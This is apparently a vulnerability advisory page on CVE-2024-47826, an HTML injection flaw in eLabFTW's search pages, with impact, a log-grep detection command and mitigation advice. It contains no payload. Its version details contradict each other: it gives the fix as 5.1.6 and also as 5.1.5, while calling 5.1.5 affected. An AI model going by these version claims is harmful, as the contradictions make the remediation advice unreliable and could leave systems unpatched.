Plattform
php
Komponente
elabftw
Behoben in
5.1.6
CVE-2024-47826 describes a Cross-Site Scripting (XSS) vulnerability affecting eLabFTW versions prior to 5.1.5. This flaw allows attackers to inject arbitrary HTML tags into specific pages within the application, potentially leading to information disclosure or defacement. The vulnerability impacts the "experiments.php" (show mode), "database.php" (show mode), and "search.php" pages. A fix is available in version 5.1.5.
An attacker can exploit this XSS vulnerability by crafting a malicious HTML payload and injecting it into the extended search string within the affected pages. When a user views the page containing the injected HTML, their browser will execute the malicious code. While the vulnerability description notes that arbitrary JavaScript execution is not possible due to security measures, the injected HTML can still be used for various malicious purposes, such as displaying misleading information, redirecting users to phishing sites, or stealing sensitive data through cross-site scripting techniques. The blast radius is limited to users accessing the affected pages, but the impact can be significant depending on the attacker's goals.
CVE-2024-47826 was publicly disclosed on 2024-10-14. There is no indication of active exploitation or inclusion in the CISA KEV catalog at the time of writing. Public proof-of-concept (POC) code is not widely available, but the vulnerability's nature makes it relatively easy to exploit given access to the affected pages.
Research labs and organizations utilizing eLabFTW for electronic lab notebooks are at risk. Specifically, deployments using older versions (≤ 5.1.5) are vulnerable. Shared hosting environments where multiple users share the same eLabFTW instance are also at increased risk, as a compromised user account could be leveraged to exploit the vulnerability.
• php: Examine access logs for requests to experiments.php, database.php, or search.php containing unusual HTML tags or patterns in the search query parameters.
grep -i 'alert|danger|script' /var/log/apache2/access.log | grep -i 'experiments.php|database.php|search.php'disclosure
Exploit-Status
EPSS
0.38% (59% Perzentil)
CISA SSVC
CVSS-Vektor
The primary mitigation for CVE-2024-47826 is to upgrade eLabFTW to version 5.1.5 or later, which contains the fix for this vulnerability. If upgrading is not immediately feasible, consider implementing input validation and sanitization on the extended search string to prevent the injection of malicious HTML. Web Application Firewalls (WAFs) can also be configured to filter out potentially malicious requests containing HTML tags in the search parameters. Regularly review and update your security policies and procedures to address potential XSS vulnerabilities.
Aktualisieren Sie eLabFTW auf Version 5.1.5 oder höher. Diese Version enthält eine Korrektur für die HTML-Injection-Schwachstelle. Das Update kann über die üblichen Software-Update-Kanäle durchgeführt werden.
Schwachstellenanalysen und kritische Warnungen direkt in deinen Posteingang.
CVE-2024-47826 is a Cross-Site Scripting (XSS) vulnerability in eLabFTW versions up to 5.1.5, allowing attackers to inject HTML into specific pages.
You are affected if you are using eLabFTW version 5.1.5 or earlier. Upgrade to 5.1.5 to resolve the vulnerability.
Upgrade eLabFTW to version 5.1.5 or later. Consider input validation and WAF rules as temporary mitigations.
There is currently no evidence of active exploitation, but the vulnerability is relatively easy to exploit.
Refer to the eLabFTW project's official website or security advisories for the latest information.
Lade deine Abhängigkeitsdatei hoch und erfahre sofort, ob dich diese und andere CVEs treffen.